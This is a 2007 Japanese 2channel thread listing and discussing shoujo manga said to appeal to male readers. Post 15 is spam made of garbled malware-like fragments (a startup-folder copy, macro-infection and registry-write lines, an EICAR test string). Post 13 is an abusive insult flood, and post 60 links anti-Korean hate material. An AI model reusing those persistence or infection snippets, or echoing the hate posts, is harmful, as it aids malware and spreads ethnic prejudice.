5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

男が読んでも面白い少女漫画は?12冊目

1 :花と名無しさん:2007/10/10(水) 04:12:21 ID:???0
男から見ても問題なく面白いと思える少女漫画を教えてください。


このスレではなるべく紹介にとどめておいてください。
煽りに乗るのは荒れる元。なるべく余所とは一線を画しましょう。
このスレの存在意義を疑われる元になります。

ではみなさん、平和にマターリ・・・

推薦作品・過去ログ等
まとめサイト(現在消失)
http://girlcomicformen.fc2web.com/
まとめWiki
http://girlcomicformen.feena.org/

前スレ > 男が読んでも面白い少女漫画は?11冊目
http://anime2.2ch.net/test/read.cgi/gcomic/1177363046/

自分に合った少女漫画をお探しの方はこちら
少女漫画図書館 Part14
http://anime2.2ch.net/test/read.cgi/gcomic/1185196179/

2 :花と名無しさん:2007/10/10(水) 04:14:24 ID:???0
テンプレは量が多いという議論もあったのでWikiを参照のこと。
突き放しすぎという意見があるようなら、新世代オススメテンプレを作成することにする。次スレは>>950あたりで。

以上。

3 :花と名無しさん:2007/10/10(水) 04:16:53 ID:???0
【白泉社 その1】
《花とゆめCOMICS》
明智抄      「サンプル・キティ」 全4巻 文庫版全4巻
麻生みこと   「GO!ヒロミ GO!」 全8巻
イチハ       「女子妄想症候群」 1〜9巻(以下続刊)
樹なつみ     「朱鷺色三角」 全5巻  文庫版全3巻
樹なつみ     「パッション・パレード―朱鷺色三角 2」 全6巻 文庫版全3巻
樹なつみ     「花咲ける青少年」 全12巻 文庫版全6巻
遠藤淑子    「ヘヴン」 全2巻
大島弓子    「綿の国星」 全7巻 文庫版全4巻
河惣益巳    「サラディナーサ」 全9巻 文庫版全5巻
川原泉      「笑う大天使(ミカエル)」 全3巻 文庫版全2巻
川原泉      「メイプル戦記」 全3巻 文庫版全3巻
川原泉      「銀のロマンティック…わはは」 全1巻 文庫版は甲子園の空に笑え!に収録
かわみなみ   「シャンペン・シャワー」 全6巻 文庫版全3巻
菅野文      「オトメン(乙男)」 1巻〜2巻(以下続刊)
坂田靖子    「バジル氏の優雅な生活」 全9巻 文庫版全5巻
佐々木倫子  「動物のお医者さん」 全12巻 文庫版全8巻
柴田昌弘    「赤い牙ブルー・ソネット」 全19巻 文庫版全11巻 完全版全8巻
高尾滋      「てるてるX少年」 全11巻
高屋奈月    「フルーツバスケット」 全23巻
津田雅美    「彼氏彼女の事情」 全21巻
仲村佳樹    「スキップ・ビート!」 1〜16巻(以下続刊) 16巻6月19日発売
那州雪絵    「ここはグリーン・ウッド」 全11巻 文庫版全6巻
葉鳥ビスコ   「桜蘭高校ホスト部」 1〜10巻(以下続刊)
成田美名子   「エイリアン通り」 全8巻 文庫版全4巻
成田美名子  「CIPHER」 全12巻 文庫版全7巻
ひかわきょうこ 「彼方から」 全14巻 文庫版全7巻
樋口橘      「学園アリス」 1〜13巻(以下続刊)
樋口橘      「MとNの肖像」 全6巻
日渡早紀    「ぼくの地球を守って」 全21巻 文庫版全12巻 愛蔵版全10巻
魔夜峰央    「パタリロ!」 1〜80巻(以下続刊) 文庫版1〜44巻(以下続刊)

4 :花と名無しさん:2007/10/10(水) 04:18:14 ID:???0
【白泉社 その2】
《花とゆめCOMICS》
美内すずえ    「ガラスの仮面」 1〜42巻(以下続刊) 文庫版1〜23巻(以下続刊)
緑川ゆき     「夏目友人帳」 1巻〜3巻(以下続刊)
三原順       「はみだしっ子」 全13巻 文庫版全6巻
森生まさみ    「おまけの小林クン」 全16巻
杜野亜希     「ヒロインを探せ」神林&キリカシリーズ 全22巻
山内直美     「なんて素敵にジャパネスク」 全11巻 文庫版全6巻 愛蔵版全7巻
山岸涼子     「日出処の天子」 全11巻 文庫版全7巻
山口美由紀    「春告小町」 全4巻
山口美由紀    「天空聖龍 〜イノセント・ドラゴン〜」 1〜3巻(以下続刊)
やまざき貴子   「っポイ!」 1〜24巻(以下続刊)
由貴香織里    「天使禁猟区」 全20巻 文庫版10巻
由貴香織里    「ルードヴィッヒ革命」 1〜3巻(以下続刊) 3巻6月19日発売
羅川真里茂    「しゃにむにGO」 1〜26巻(以下続刊) 26巻6月19日発売
羅川真里茂    「赤ちゃんと僕」 全18巻 文庫版全10巻
和田慎二     「ピグマリオ」 全27巻 愛蔵版全12巻
わかつきめぐみ 「So What?」 全6巻 文庫版全4巻


《花とゆめCOMICS SPECIAL》
樹なつみ      「OZ」 全4巻 完全収録版全5巻


《Jets COMICS》
清水玲子     「秘密 THE TOP SECRET」 1〜3巻(以下続刊)
にざかな     「B.B.joker」 全5巻
樹なつみ     「獣王星」 全5巻 完全版全3巻

5 :花と名無しさん:2007/10/10(水) 04:20:43 ID:???0
【集英社 その1】
《マーガレットコミックス》
池田理代子 「ベルサイユのバラ」 全10巻 文庫版全5巻 完全版全9巻
神尾葉子   「花より男子」 全36巻 完全版全20巻
河原和音   「高校デビュー」 1〜8巻(以下続刊)
椎名軽穂  「君に届け」 1〜4巻(以下続刊)
多田かおる 「イタズラなKiss」 全23巻 文庫版全14巻
桃森ミヨシ  「ハツカレ」 全10巻
中原アヤ   「ラブ★コン」 1〜16巻(以下続刊)


《クイーンズコミックス》
羽海野チカ 「ハチミツとクローバー」 全10巻


《りぼんマスコットコミックス》
小花美穂   「こどものおもちゃ」 全10巻 完全版全7巻 文庫版1〜6巻
太刀掛秀子 「花ぶらんこゆれて・・・」 全4巻 文庫版全2巻
津山ちなみ 「HIGH SCORE」 1〜5巻(以下続刊)
萩岩睦美   「銀曜日のおとぎばなし」 全6巻 文庫版全3巻
柊あおい   「星の瞳のシルエット」 全10巻 文庫版全6巻
柊あおい   「銀色のハーモニー」 全7巻 文庫版全4巻
槙ようこ    「愛してるぜベイベ★★」 全7巻
水沢めぐみ 「姫ちゃんのリボン」 全10巻 文庫版全7巻
矢沢あい   「天使なんかじゃない」 全8巻 完全版
一条ゆかり  「有閑倶楽部」 1〜19巻(以下続刊) 文庫版1〜10巻
岡田あーみん 「お父さんは心配性」 全6巻 文庫版全4巻
岡田あーみん 「こいつら100%伝説」 全3巻


《りぼんマスコットコミックスCookie》
矢沢あい   「NANA」 1〜17巻(以下続刊)

6 :花と名無しさん:2007/10/10(水) 04:22:37 ID:???0
【集英社 その2】
《ぶーけコミックス》
逢坂みえこ 「永遠の野原」 全16巻 文庫版全9巻
松苗あけみ 「純情クレイジーフルーツ」 前編・後編+続編全9巻 文庫版全1巻+続編全5巻
水樹和佳子 「イティハーサ」 全12巻 文庫版全7巻
水樹和佳子 「樹魔・伝説」 全1巻 文庫版全1巻

《YOUコミックス》
森本梢子   「研修医なな子」 全7巻 文庫版全4巻

【小学館 その1】
《フラワーコミックス》
新井理恵  「LOVELESS」 全2巻
篠原千絵  「海の闇、月の影」 全18巻 全11巻
篠原千絵  「闇のパープル・アイ」 全12巻 文庫版全7巻
竹宮恵子  「風と木の詩」 全17巻 文庫版全10巻 愛蔵版全4巻
田村由美  「BASARA」 全27巻 文庫版全16巻
田村由美  「7SEEDS」 1〜10巻(以下続刊)
萩尾望都  「ポーの一族」 全5巻 文庫版全3巻
藤原よしこ 「キス、絶交、キス ボクらの場合」 全10巻+1巻
吉田秋生  「BANANA FISH」 全19巻 文庫版全11巻
吉田秋生  「YASHA 夜叉」 全12巻 文庫版全6巻
私屋カヲル 「少年三白眼」 全3巻 新装版全3巻
渡辺多恵子 「風光る」 1〜21巻(以下続刊)
渡辺多恵子 「ファミリー」 全11巻 文庫版全6巻 新装版1〜2巻
佐々木淳子 「ダークグリーン」 全10巻 文庫版全5巻(メディアファクトリー刊)

《Betsucomiフラワーコミックス》
芦原妃名子 「砂時計」 全10巻
和泉かねよし 「ダウト!」 全6巻

7 :花と名無しさん:2007/10/10(水) 04:24:40 ID:???0
【小学館 その2】
《別コミフラワーコミックス・スペシャル》
新井理恵   「X-ペケ-」 全7巻

《小学館文庫》
萩尾望都   「11人いる!」 全1巻

【講談社】
《なかよしKC》
木村千歌   「あずきちゃん」 全5巻
小坂理絵   「ヒロインをめざせ!」 全2巻

《フレンドKC》
大和和紀   「はいからさんが通る」 全8巻 文庫版全4巻
大和和紀   「ヨコハマ物語」 全9巻 文庫版全4巻

《別冊フレンド KC》
惣領冬実   「MARS」 全15巻 文庫版全8巻
ジョージ朝倉 「恋文日和」 1〜3巻(以下続刊)
すえのぶけいこ 「ライフ」 1〜15巻(以下続刊)
はやかわともこ 「ヤマトナデシコ七変化」 1〜18巻(以下続刊)

《Kiss KC》
小川彌生   「きみはペット」 全14巻
二ノ宮知子  「のだめカンタービレ」 1〜17巻(以下続刊)
二ノ宮知子  「GREEN-農家のヨメになりたい-」 全4巻

《mimi KC》
大和和紀   「あさきゆめみし」 全13巻 文庫版全7巻

《BE LOVE KC》
深見じゅん  「悪女(わる)」 全37巻 文庫版全19巻

8 :花と名無しさん:2007/10/10(水) 04:27:36 ID:???0
【秋田書店】
《プリンセスコミック》
青池保子  「アルカサル-王城-」 1〜12巻(以下続刊)
青池保子  「エロイカより愛をこめて」 1〜34巻(以下続刊)文庫版1〜20巻(以下続刊)
あしべゆうほ 「悪魔(デイモス)の花嫁」 1〜17巻(以下続刊) 文庫版1〜12巻(以下続刊)
中山星香  「妖精国(アルフヘイム)の騎士」 全54巻 文庫版全27巻
水城せとな 「放課後保健室」 1〜7巻(以下続刊)

《ボニータコミックス》
あしべゆうほ 「クリスタル・ドラゴン」 1〜24巻(以下続刊)文庫版1〜11巻(以下続刊)
市東亮子   「やじきた学園道中記」 1〜29巻(以下続刊)文庫版1〜14巻(以下続刊)

【朝日ソノラマ】
《眠れぬ夜の奇妙な話コミックス》
今市子    「百鬼夜行抄」 1〜15巻(以下続刊) 文庫版1〜8巻(以下続刊)
川原由美子 「観用少女(プランツ・ドール)」 全4巻 文庫版全2巻 愛蔵版全2巻
TONO    「チキタ★GUGU」 1〜7巻(以下続刊)
波津彬子   「雨柳堂夢咄」 1〜11巻(以下続刊)文庫版1〜6巻(以下続刊)

【宙出版】
《ミッシイ・コミックス》
池田さとみ  「外科医 東盛玲の所見」 全11巻 文庫版全7巻+番外編1巻
TEAM猫十字社 「幻獣の國物語」 1〜16巻(未完:文庫版1〜11巻

【祥伝社】
《FEEL COMICS》
ジョージ朝倉 「カラオケバカ一代」 全1巻
《FEEL COMICS GOLD》
二ノ宮知子 「平成よっぱらい研究所」 全1巻 文庫版全1巻

9 :花と名無しさん:2007/10/10(水) 04:29:14 ID:???0
【新書館】
《WINGS COMICS》
江ノ本瞳  「セシリア・ドアーズ」 全2巻
伸たまき  「パーム」 1〜29巻(以下続刊)

【一迅社】
《ZERO-SUMコミックス》
おがきちか 「Landreaall」 1〜8巻(以下続刊)

【偕成社】
《ファンタジーコミックス》
紺野キタ  「ひみつの階段」 全2巻 完全版全2巻

【ソニーマガジンズ】
《きみとぼくCOLLECTION》
二ノ宮知子 「天才ファミリー・カンパニー」 全11巻 スペシャル版全6巻

【徳間書店】
《Charaコミックス》
TONO    「カルバニア物語」 1〜10巻(以下続刊)

【ぶんか社】
《ぶんか社コミックス ホラーMシリーズ》
三家本礼  「ゾンビ屋れい子」 全11巻 文庫版全7巻

【MAC GARDEN】
《BLADE COMICS》
森永あい  「僕と彼女の×××」 1〜4巻(以下続刊)

10 :花と名無しさん:2007/10/10(水) 04:33:50 ID:???0
Landreaallとか10巻まででてるやん? せめてWikiからひっぱってきたら。

11 :花と名無しさん:2007/10/10(水) 04:35:42 ID:???0
>>10
そういうことはせめてWikiを確認してから書いたら

12 :花と名無しさん:2007/10/10(水) 04:44:12 ID:???0
絶賛放置中ってわけでもないのか。ばっさり10冊くらいにまとめよう。

13 :udlsrkisi:2007/10/10(水) 04:53:33 ID:???0
2ちゃんの無職キモオタ死ねよゴミ 2ちゃんの無職キモオタ死ねよゴミ 
2ちゃんの無職キモオタ死ねよゴミ 2ちゃんの無職キモオタ死ねよゴミ
2ちゃんの無職キモオタ死ねよゴミ 2ちゃんの無職キモオタ死ねよゴミ
2ちゃんの無職キモオタ死ねよゴミ 2ちゃんの無職キモオタ死ねよゴミ
2ちゃんの無職キモオタ死ねよゴミ 2ちゃんの無職キモオタ死ねよゴミ
2ちゃんの無職キモオタ死ねよゴミ 2ちゃんの無職キモオタ死ねよゴミ
2ちゃんの無職キモオタ死ねよゴミ 2ちゃんの無職キモオタ死ねよゴミ
2ちゃんの無職キモオタ死ねよゴミ 2ちゃんの無職キモオタ死ねよゴミ
2ちゃんの無職キモオタ死ねよゴミ 2ちゃんの無職キモオタ死ねよゴミ

14 :花と名無しさん:2007/10/10(水) 05:04:14 ID:???0
>>10
恥ずかしい奴だな、オマエは。

15 :花と名無しさん:2007/10/10(水) 17:51:01 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


16 :花と名無しさん:2007/10/10(水) 21:05:11 ID:???0
恥ずかしい>>10ガイルと聞いて飛んできました

17 :花と名無しさん:2007/10/11(木) 19:53:47 ID:???O
テンプレ>>9
新書館「魔法使いの娘」那州雪絵 5巻(以下続刊)
って入ってないんだっけ?
たまにしか来ないから、テンプレ基準がよく理解出来てないがw

18 :花と名無しさん:2007/10/11(木) 20:06:49 ID:???0
>>17
Wikiのテンプレをコピペしてるだけでしょ
>>10>>17みたいな人が随時編集してくれたらいいと思うよ

19 :花と名無しさん:2007/10/11(木) 21:52:53 ID:???0
柳原望が入ってないんだね。

20 :花と名無しさん:2007/10/11(木) 21:58:15 ID:???0
>>19
そう思ったら紹介文でも書けばいいのに

21 :花と名無しさん:2007/10/11(木) 21:59:40 ID:???0
前スレで出てたからいいじゃん。

22 :19:2007/10/11(木) 22:06:40 ID:???0
>>20
テンプレに入れてきた。アドバイス感謝。

23 :花と名無しさん:2007/10/11(木) 22:26:12 ID:???0
>>19
いや、勝手にテンプレに追加しろとは言ってないんだけど


24 :花と名無しさん:2007/10/14(日) 02:19:01 ID:???0
クソ野郎が常駐してんのか?

25 :花と名無しさん:2007/10/14(日) 03:19:04 ID:???O
おがきちかが少女漫画家扱いなのをはじめて知った
男が読んでも面白いよ

26 :花と名無しさん:2007/10/14(日) 03:22:21 ID:???0
>>25
微エロ描いてたからねえ

27 :花と名無しさん:2007/10/15(月) 12:16:02 ID:???O
>>25
ランドリの掲載誌が少女漫画誌(ゼロサム)だからだろ。
以前にも「少女漫画」の定義は既出だが、誰が描いているかどうかじゃなく
掲載誌が少女・女向けかどうかが、このスレでの扱いの判断基準と思われ。

28 :花と名無しさん:2007/10/15(月) 18:24:15 ID:???0
マニア誌の掲載が殆どになってしまった
自称少女漫画家な人なども扱いに困る・・・か

29 :花と名無しさん:2007/10/15(月) 18:32:38 ID:???0
そんなパイナップルみたいな人を...。

30 :花と名無しさん:2007/10/16(火) 00:00:04 ID:rX6Qy6Rx0
 少女漫画事情が『百鬼夜行抄』あたりで止まってるオッサンなんだが、
最近の少女漫画で男でも楽しめるのって、どんなのがあるの?
 まとめwikiは刊行年が書いてないんで、古い新しいの区別がイマイチ
わかりにくいんだよね。


31 :花と名無しさん:2007/10/16(火) 02:30:37 ID:???0
テンプレも勿論参考になるが、それよりもちょっとしたきっかけで
特定の作家についての話が盛り上がる数レスが凄くためになる

32 :花と名無しさん:2007/10/17(水) 08:19:23 ID:???0
漫画喫茶でバイトしてる21歳の学生です。
バイト中の休憩中に読む少女漫画を探してます。

今まで読んで面白かったと思うのは
「赤ちゃんと僕」「しゃにむにGO」「のだめカンタービレ」
「BANANA FISH」「動物のお医者さん」「山田太郎ものがたり」
とかです。
あんまりあくの強い絵柄じゃなく、ほのぼのとかホンワカしてて
ドロドロの恋愛とか異常に内面世界に入ったりしないやつが好きみたいです。
NANAとかは途中で読むのやめてしまいました。
何かお勧めとかないでしょうか?

33 :花と名無しさん:2007/10/17(水) 08:28:37 ID:???0
>>32
テンプレ読むか、Wikiかここへ行ってくださいね

>>1
>自分に合った少女漫画をお探しの方はこちら
>少女漫画図書館 Part14
http://anime2.2ch.net/test/read.cgi/gcomic/1185196179/

34 :花と名無しさん:2007/10/17(水) 08:55:12 ID:???0
>>32
柳原望かなぁ。
それでも画のアクが強いと思うのなら、ひかわきょうこ。
白泉社嫌いなら、大野潤子でどうでしょう。

>>33
その意見も正しいと思うけど、「男が読んでも面白い少女漫画は?」というラインにぎりぎり乗ってる質問じゃないかなぁ。
質問者が男じゃなかったら、ごめんなさいだけどw

35 :花と名無しさん:2007/10/17(水) 09:12:18 ID:???0
>>33
なるほど、ここは質問スレではないわけですね。失礼しました。

>>34
一応男なんで書き込みしました。
白泉社とか出版社での作風の違いとかはあまりよくわかりません。。
あと作家だとどの作品読めばいいかまったくわからないので
その中でも有名な作品とかあげていただけると助かります。。
とりあえず、33の人が教えてくれたスレで質問することにします。

36 :花と名無しさん:2007/10/17(水) 09:16:38 ID:???0
>>34
”質問者”という時点でもうスレ違いだな
そもそもここは質問を受け付けるスレじゃなく、面白かった漫画を紹介するスレ
最初から34は勘違いしている

37 :花と名無しさん:2007/10/17(水) 14:41:34 ID:???0
確かにこのタイトルは質問スレにも見えるな。
「〜を挙げろ」みたいなほうがいいのか?

38 :花と名無しさん:2007/10/17(水) 16:54:41 ID:???0
質問に答える余地も少しは残しておいた方がいいと思うなぁ
男が男向けを薦めるって図書館の方じゃニュアンス的に対応出来ないだろうし
だからってテンプレの作品読んどけってだけじゃ広がりが無いと思うよ

39 :花と名無しさん:2007/10/17(水) 18:31:22 ID:???0
>>35
せっかく興味が湧いてるんなら、も少しだけ自己努力してみたら?
俺は1年前まで少女マンガにはほぼ無知無縁だったが
ガイド本・評論本やレビューサイト・ブログを読み漁って
一定の知識ベースの形成に努めたけどな。
そうして初めて、ココも図書館スレも役に立つようになった。
労を惜しんで果実だけ得ようとしても相手にされないのが関の山だから

40 :花と名無しさん:2007/10/17(水) 19:05:20 ID:???0
>>38
○○は面白いと聞くが如何? という「確認」ならまだしも、
面白い××を紹介してくれ! という「依頼」はやっぱスレチだろうな。
図書館スレで男だと表明して依頼すれば大抵事足りるだろうし。
(回答者を男のみに制限したりしたら顰蹙だろうけど)
ここも女性住人けっこういるっぽいし、
見かけだけの男同士コミュニケーションに大した意味は無いと思う。


41 :花と名無しさん:2007/10/17(水) 19:10:25 ID:???0
>>38
必要ないでしょ

42 :花と名無しさん:2007/10/18(木) 11:35:12 ID:???0
小姑みたいなのが居るね

43 :花と名無しさん:2007/10/18(木) 13:41:32 ID:???0
このスレなら小舅だろうけどな

44 :花と名無しさん:2007/10/18(木) 20:09:33 ID:???0
説教の魅力を知るとたまらないもんらしい

45 :花と名無しさん:2007/10/18(木) 21:56:27 ID:???0
君の青春は輝いているか

46 :花と名無しさん:2007/10/18(木) 22:45:42 ID:???0
>>39
そんなにめんどくさいのか
だったら別にいいや

47 :花と名無しさん:2007/10/19(金) 03:40:19 ID:???0
こうしてアンチに堕ちていくビギナー野郎がまた一人

48 :花と名無しさん:2007/10/19(金) 04:07:13 ID:???0
>>46
本なんかわざわざ買わんでいいが
ここや図書館の過去スレを流し読みするだけでも大分違うけどな
(とアドバイスしても実行する教えてチャソはまずいないだろうが)

49 :花と名無しさん:2007/10/19(金) 09:40:39 ID:???0
教えてちゃんというよりかまってちゃんだから大丈夫(何が)

50 :花と名無しさん:2007/10/19(金) 22:36:21 ID:2sj357Po0
グリーンウッドでしょう


51 :花と名無しさん:2007/10/19(金) 22:43:53 ID:???0
>>9
パームって29巻も続いてたんだ・・・
かなり昔に読んだきりだったのでちょっと驚いた

52 :花と名無しさん:2007/10/19(金) 22:44:01 ID:???0
ていうかよく知らん作家や作品の名前だけ
ぽっと紹介されても「ふぅん」って感じで
あんまり読んでみる気にならんものじゃない?

紹介する方も作為を混ぜちゃうのを警戒したり
相手に合わない物紹介しちゃったらどうしようかとか
いろいろ考えて尻込みしがちだし。

個人的にはここの過去スレか今一番面白いor最高スレをばーっと流し読みして
ナチュラルな流れの中で何回もタイトルが出てくるやつを読んでみるのをおすすめ
そうやって探すと割と当たりが多かった。

君に届け(椎名軽穂・集英社)とか僕等がいた(小畑友紀・小学館)とかの
超頻出はやっぱり面白かったよ

53 :花と名無しさん:2007/10/19(金) 22:47:44 ID:???0
>>52
ちょww誰に対してそのレスをしてるのかわからないんだがw

54 :花と名無しさん:2007/10/19(金) 23:06:17 ID:???0
「ていうか」「つーか」とかを最初から使っているレスは聞き流しとけ

55 :花と名無しさん:2007/10/20(土) 00:17:13 ID:???0
佐原ミズのバス走る
橘裕の人形師の夜
は男子にも評判良かった。

56 :花と名無しさん:2007/10/20(土) 02:14:53 ID:???0
>>55
佐原ミズってほしのこえのイメージが強いんで少女漫画って感じがしてなかった。
メロディにも書いてるんだね。

57 :花と名無しさん:2007/10/20(土) 02:41:34 ID:???0
>>56
一応少女漫画家でもあったのか
「マイガール」1巻はビミョーだったが絵は好きなので懲りずに手を出してみる

58 :花と名無しさん:2007/10/20(土) 09:32:40 ID:???0
青年誌でかくときは佐原で
BL誌のときは夢花李名義じゃなかった?
バス走るは青年誌では

59 :花と名無しさん:2007/10/20(土) 10:55:49 ID:???O
ひとりでできるもん
西炯子

参番町萩原屋の美人も読みたいが近くの漫喫に無い・・・


60 :花と名無しさん:2007/10/20(土) 11:39:11 ID:???O
韓国人が大喜び!!『地震で日本人が、たくさん死ねば良い』
http://www.enjoykorea.jp/tbbs/read.php?board_id=teconomy&page=5&nid=2849898
衝撃!!日本輸出向け、キムチに、タン唾を入れる韓国人のババア
http://plaza.rakuten.co.jp/img/user/51/17/385117/22.jpg
朴一「韓国人犯罪者を日本人名で報道すべき」
悪人を日本人にしたがる韓国人
http://www.youtube.com/watch?v=QLXTk7IG0dg 韓国旅行中にレイプされた日本人
http://tour2korea.k-free.net
http://tour2korea.k-free.net/rapetaiken.html

61 :花と名無しさん:2007/10/22(月) 04:28:00 ID:???O
ワンピの尾田が推薦してたんで買った「CRASH」って漫画、ノリが少年漫画ぽくてよかったよ。
でもどっちかっつーと腐女子にウケるなアレは。

62 :花と名無しさん:2007/10/22(月) 04:49:37 ID:???O
何度も既出だろうけど『動物のお医者さん』かな
年齢や性別の枠を超えた名作

63 :花と名無しさん:2007/10/22(月) 05:01:36 ID:???0
うちの亡くなったおかん
漫画読まない人だったのに
動物のお医者さんだけは愛読してました
なつかすぃ

64 :花と名無しさん:2007/10/22(月) 05:04:38 ID:???0
↑ちなみに、自分の好きな漫画を読ませようと
さりげなく居間に置きっぱにしてたりしたのですが
成功したのはこれだけでしたw

65 :花と名無しさん:2007/10/22(月) 21:31:34 ID:???O
>>64
他にどんなマンガを置いていたのか気になりますなぁw

66 :花と名無しさん:2007/10/25(木) 04:49:24 ID:???O
愛俺

67 :花と名無しさん:2007/10/27(土) 01:27:49 ID:???0
いつのまに過疎スレに

68 :花と名無しさん:2007/10/27(土) 06:20:36 ID:tU1hFW/gO
フルーツバスケット
あたしはバンビ
愛してるぜベイベ
星の声
僕らがいた
CCさくら
clover

H(エイチ)
NANA
パートナー

あとは〜…オノナツメの作品かなぁ
BLはあまり好きではないが

69 :花と名無しさん:2007/10/27(土) 14:56:38 ID:???0
フルバとベイベは読んだなぁ

70 :花と名無しさん:2007/10/27(土) 21:24:37 ID:???0
古本漁った時に面白かった漫画

「ぼくの学校は戦場だった」楠桂
少女漫画に見えない。面白い。

「DJシリーズ」山下友美
ラジオ好きなんで妙に気に入った。

「しあわせインベーダー」こがわみさき
なんかあったかい。女の子かわいい。

「GREEN」二ノ宮知子
最終回はめっちゃ笑わせてもらった。

「カルバニア物語」TONO
結構リアルな内容。継続中。


71 :花と名無しさん:2007/10/28(日) 06:32:25 ID:ZZF0bmzM0
やっと読めた、STAYシリーズ。
男の理想の恋愛イメージを木っ端微塵に粉砕する
キレモノ女子高生みちるに悶絶死。
スゲエよ西炯子。

72 :花と名無しさん:2007/10/28(日) 13:00:48 ID:???O
そもそも「男が読んでも面白い少女漫画は?」
ってスレタイ自体が思い上がり激しいよな。

「男である自分のメガネにかなう少女漫画はこれ」
って言ってるようなものだし。

見下し感があるから、次からスレタイ変えた方がいいかも。

73 :花と名無しさん:2007/10/28(日) 13:02:52 ID:???0
>>72
12冊目になってから言うなよw

74 :花と名無しさん:2007/10/28(日) 13:11:03 ID:???0
>>72
べつに無理に変えることもないと思うけど
いちおう代案はきいてみたい


75 :花と名無しさん:2007/10/28(日) 13:32:06 ID:???0
>>72
(少女漫画という呼称で少女・女性向けとしてカテゴライズされている漫画作品のうち、
本来は読者として想定されていないであろう)男が読んでも面白い少女漫画は?

ってだけで、特に上下意識なんてないだろ。ヘンなイチャモンつけんなや

76 :花と名無しさん:2007/10/28(日) 13:58:37 ID:???O
それなら別に
「(少女漫画の)初心者におすすめな少女漫画」
みたいなスレタイでもいいわけで。

何でいちいち「男」であることを主張するんだ?

女で少年漫画好きは、女とわかると即腐女子扱いで
叩かれるのに、男は自分が男だと隠そうともしない。
自分達が日陰の身だと自覚しろよ。

自分男アピールうざ。書き込みから男臭消して同化しろ。

77 :花と名無しさん:2007/10/28(日) 14:15:19 ID:???0
お〜、伸びる伸びる
自分が叩かれたから、ここで騒いでるの?
そりゃ、筋違いだ。

男(の自分)が読む少女漫画であって、初心者が読めることとは別の問題じゃない?

日陰どうこうは別にいいけど、その書き方だとまるで自虐だ。

78 :花と名無しさん:2007/10/28(日) 14:18:43 ID:???0
読解力の無い頭の悪い腐女子orネカマ相手にすんなよ。
まあ保守になるからいっか。

79 :花と名無しさん:2007/10/28(日) 14:29:43 ID:???0
本題回帰。知る男(ひと)ぞ知る作品を。

神尾葉子「花よリ団子」
ニノ宮知子「のだめ力ン夕一ビレ」
失沢あい「NANA」

80 :花と名無しさん:2007/10/28(日) 14:29:47 ID:???0
ていうか、思い上がりも何も、そもそもそういう意図でスレが立ってるんだから
ここが気に入らなければ別途、自分でスレを立てればいいだけではないかと
誰も無理にここでがんばってくれなんて頼んでないんだしね?

81 :花と名無しさん:2007/10/28(日) 16:59:48 ID:???O
概出だがハチミツとクローバーは面白かったな
ニートな時に妹の部屋侵入して試しに読んでみたら
引き込まれるように10巻まで読み平らげちゃったよ

82 :花と名無しさん:2007/10/28(日) 19:06:34 ID:???0
少女漫画は日陰者の読むものということで

83 :花と名無しさん:2007/10/28(日) 19:10:50 ID:???0
>>81
「既出」だよ、
それがわざとでなければ。

84 :花と名無しさん:2007/10/28(日) 22:18:45 ID:???0
知ってるけど、もうそんな娯字にいちいち突っ込む人いないと思ってたわ

85 :花と名無しさん:2007/10/28(日) 22:23:43 ID:???0
男の少女漫画読みだなんて20年前は、居て当然。
むしろ胸を張って言えた物だったんだけどねぇ

86 :花と名無しさん:2007/10/28(日) 23:05:12 ID:U/junP/A0
池田理代子「ベルサイユのばら」
わたなべまさこ「ガラスの城」
水野英子「白いトロイカ」
山本鈴美香「エースをねらえ」
以上すべてマーガレットコミックスで読んだが
とても面白かった。

87 :花と名無しさん:2007/10/28(日) 23:06:48 ID:???0
古っw

88 :花と名無しさん:2007/10/28(日) 23:09:06 ID:JVoKAfMlO
高橋しんのトムソーヤ

89 :花と名無しさん:2007/10/29(月) 00:00:36 ID:???0
エースをねらえは、パワーインフレ起こした挙句に宗教に走るのがすごい

90 :花と名無しさん:2007/10/29(月) 07:41:12 ID:???0
今月のコーラスの少女漫画っていうタイトルの連載でお前らのことが
書いてあったから気になる奴はちょっと読んどけや。

91 :花と名無しさん:2007/10/29(月) 14:57:32 ID:???0
>>84
概出w

92 :花と名無しさん:2007/10/29(月) 17:33:25 ID:xONddFmE0
ベルセルク、北斗の拳、バスタード等が好きな彼氏は
こなみ詔子 Anghel blood アンヘルブラッド 面白いと言ってた。
理由は血が出るシーンがあるからとのこと。
他は高階良子作品全般

93 :花と名無しさん:2007/10/29(月) 17:42:06 ID:???O
ないしょのつぼみ読んどけ

94 :花と名無しさん:2007/10/29(月) 18:25:44 ID:???0
>>92
ずいぶんくだらない理由だなあ

95 :花と名無しさん:2007/10/29(月) 18:27:06 ID:???0
血が出るというか飛び散るっていったら、「X-ペケ-」だよなあ。

96 :92:2007/10/29(月) 18:56:55 ID:xONddFmE0
>>95
「X-ペケ-」???新井理恵の??
Xエックス CLAMP の間違いでは?
後者なら、これも好きです。

97 :花と名無しさん:2007/10/29(月) 19:01:46 ID:???0
前者。

98 :花と名無しさん:2007/10/29(月) 19:04:42 ID:???0
わざわざペケって書いてあるのにどうしてエックスと間違えるんだw

99 :花と名無しさん:2007/10/29(月) 19:11:00 ID:???0
ほんとだwwww

100 :92:2007/10/29(月) 19:22:32 ID:xONddFmE0
何度もスミマセン
ペケに血が飛び散る場面あったっけと思いレスしました。
ゆめみの妄想シーンですね。
失礼しました。

101 :花と名無しさん:2007/10/29(月) 19:32:09 ID:???0
いや、いろいろあるぞ
